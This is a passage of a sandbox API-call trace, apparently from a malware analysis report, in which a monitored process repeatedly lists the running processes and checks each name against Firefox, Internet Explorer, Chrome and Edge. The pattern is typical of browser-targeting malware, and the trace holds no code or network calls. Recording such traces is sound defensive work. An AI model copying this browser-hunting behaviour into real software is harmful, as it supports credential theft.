th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.433] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0171.433] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0171.433] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0171.433] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.433] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0171.433] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0171.433] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0171.433] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0171.433] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0171.433] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0171.434] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0171.434] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0171.434] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0171.434] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.434] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0171.434] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0171.434] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0171.434] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0171.434] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.434] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0171.435] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0171.435] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0171.435] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0171.435] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0171.435] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0171.435] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0171.435] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0171.435] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0171.436] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0171.436] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0171.436] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0171.436] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0171.436] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0171.436] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0171.436] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0171.437] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0171.437] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0171.437] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0171.437] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0171.437] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x790, pcPriClassBase=6, dwFlags=0x0, szExeFile="regsvr32.exe")) returned 1 [0171.470] lstrcmpiA (lpString1="regsvr32.exe", lpString2="firefox.exe") returned 1 [0171.470] lstrcmpiA (lpString1="regsvr32.exe", lpString2="iexplore.exe") returned 1 [0171.470] lstrcmpiA (lpString1="regsvr32.exe", lpString2="chrome.exe") returned 1 [0171.470] lstrcmpiA (lpString1="regsvr32.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.470] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x790, pcPriClassBase=6, dwFlags=0x0, szExeFile="regsvr32.exe")) returned 0 [0171.470] CloseHandle (hObject=0xd4) returned 1 [0171.471] Sleep (dwMilliseconds=0x3e8) [0172.550] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0172.552] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0172.553] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0172.553] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0172.553] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0172.553] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0172.553] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0172.553] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0172.553] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0172.553] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0172.553] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0172.554] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0172.554] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0172.554] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0172.554] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0172.554] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.554] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0172.555] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0172.555] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0172.555] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0172.555] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0172.555] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0172.555] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0172.555] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0172.555] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0172.555] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.555] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0172.556] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0172.556] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0172.556] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0172.556] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0172.556] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0172.556] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0172.556] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0172.556] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0172.556] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.556] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0172.557] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0172.557] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0172.557] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0172.557] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.557] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0172.557] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0172.557] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0172.558] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0172.558] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0172.558] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0172.558] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0172.558] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0172.558] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0172.558] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0172.558] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.559] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0172.559] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0172.559] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0172.559] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.559] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.559] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0172.559] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0172.559] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0172.559] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.559] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.560] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0172.560] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0172.560] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0172.560] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.560] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.560] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0172.560] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0172.560] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0172.561] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.561] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.561] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0172.561] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0172.561] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0172.561] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.561] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0172.562] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0172.562] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0172.562] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0172.562] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0172.562] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.562] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0172.562] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0172.562] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0172.562] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.562] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.563] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0172.563] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0172.563] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0172.563] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.563] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0172.563] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0172.563] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0172.563] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0172.563] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0172.563] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0172.564] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0172.564] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0172.564] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0172.564] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.564] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0172.565] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0172.565] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0172.565] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0172.565] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.565] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.565] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0172.565] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0172.565] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0172.565] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.565] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0172.566] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0172.566] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0172.566] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0172.566] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.566] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0172.566] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0172.566] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0172.566] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0172.566] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0172.566] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0172.567] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0172.567] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0172.567] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0172.567] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0172.567] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0172.567] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0172.567] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0172.567] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0172.568] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.568] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0172.568] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0172.568] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0172.568] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0172.568] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0172.568] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0172.569] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0172.569] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0172.569] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0172.569] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0172.569] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0172.569] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0172.569] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0172.569] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0172.569] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.569] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0172.570] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0172.570] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0172.570] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0172.570] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.570] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0172.570] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0172.570] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0172.570] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0172.570] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.571] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0172.571] lstrcmpiA 